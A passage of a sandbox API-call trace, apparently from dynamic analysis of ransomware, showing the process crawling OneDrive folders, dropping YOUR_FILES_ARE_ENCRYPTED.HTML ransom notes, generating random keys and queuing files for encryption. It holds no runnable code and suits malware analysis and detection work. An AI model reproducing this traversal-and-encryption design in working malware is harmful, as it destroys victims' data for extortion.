ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0159.797] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive") returned 56 [0159.797] GetProcessHeap () returned 0x270000 [0159.797] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.798] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive" [0159.798] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\*" [0159.798] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.799] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.799] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3df86f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="17.3.4604.0120", cAlternateFileName="173460~1.012")) returned 1 [0159.799] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120") returned 71 [0159.799] GetProcessHeap () returned 0x270000 [0159.799] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0159.801] lstrcpyW (in: lpString1=0x74c2008, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120" [0159.801] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\*" [0159.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3df86f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.802] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3df86f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.803] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa52341f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="af", cAlternateFileName="")) returned 1 [0159.803] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af") returned 74 [0159.803] GetProcessHeap () returned 0x270000 [0159.803] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0159.804] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af" [0159.804] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\*" [0159.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa52341f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.805] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa52341f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.805] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ab0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0159.805] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\FileSync.LocalizedResources.dll.mui") returned 110 [0159.805] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.805] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0159.805] lstrlenW (lpString=".mui") returned 4 [0159.805] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0159.805] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x12ab0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0159.805] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.806] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0159.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.806] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.808] CloseHandle (hObject=0x5a8) returned 1 [0159.809] GetProcessHeap () returned 0x270000 [0159.810] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0159.810] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="am-et", cAlternateFileName="")) returned 1 [0159.810] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et") returned 77 [0159.810] GetProcessHeap () returned 0x270000 [0159.810] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0159.810] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et" [0159.810] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\*" [0159.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.810] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.810] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xf4b0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0159.810] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\FileSync.LocalizedResources.dll.mui") returned 113 [0159.811] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.811] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0159.811] lstrlenW (lpString=".mui") returned 4 [0159.811] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0159.811] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xf4b0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0159.811] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.811] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0159.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\am-et\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.811] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.813] CloseHandle (hObject=0x5a8) returned 1 [0159.814] GetProcessHeap () returned 0x270000 [0159.815] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0159.815] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="amd64", cAlternateFileName="")) returned 1 [0159.815] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64") returned 77 [0159.815] GetProcessHeap () returned 0x270000 [0159.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0159.815] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64" [0159.815] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\*" [0159.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.818] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.818] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa56d0c90, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa56d0c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa56d0c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x48ab0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncApi64.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0159.818] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll") returned 95 [0159.818] lstrcmpW (lpString1="FileSyncApi64.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.818] PathFindExtensionW (pszPath="FileSyncApi64.dll") returned=".dll" [0159.819] lstrlenW (lpString=".dll") returned 4 [0159.819] PathFindExtensionW (pszPath="FileSyncApi64.dll") returned=".dll" [0159.819] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncapi64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.820] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=297648) returned 1 [0159.820] GetProcessHeap () returned 0x270000 [0159.820] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0159.823] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="ED") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="84") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="3D") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: 
param_1="E4") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="B5") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="82") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="79") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="FD") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="7A") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="2B") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="CF") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="67") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="7C") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="CC") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="54") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="7D") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="D5") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="41") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="A2") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="36") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="DE") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="34") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="49") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="3B") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="0B") returned 2 [0159.824] wsprintfW (in: 
param_1=0x4ebce6a, param_2="%02X" | out: param_1="15") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="BC") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="E4") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="56") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="63") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="38") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="34") returned 2 [0159.825] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll" [0159.825] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.825] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0159.825] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5873bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5873bb0, 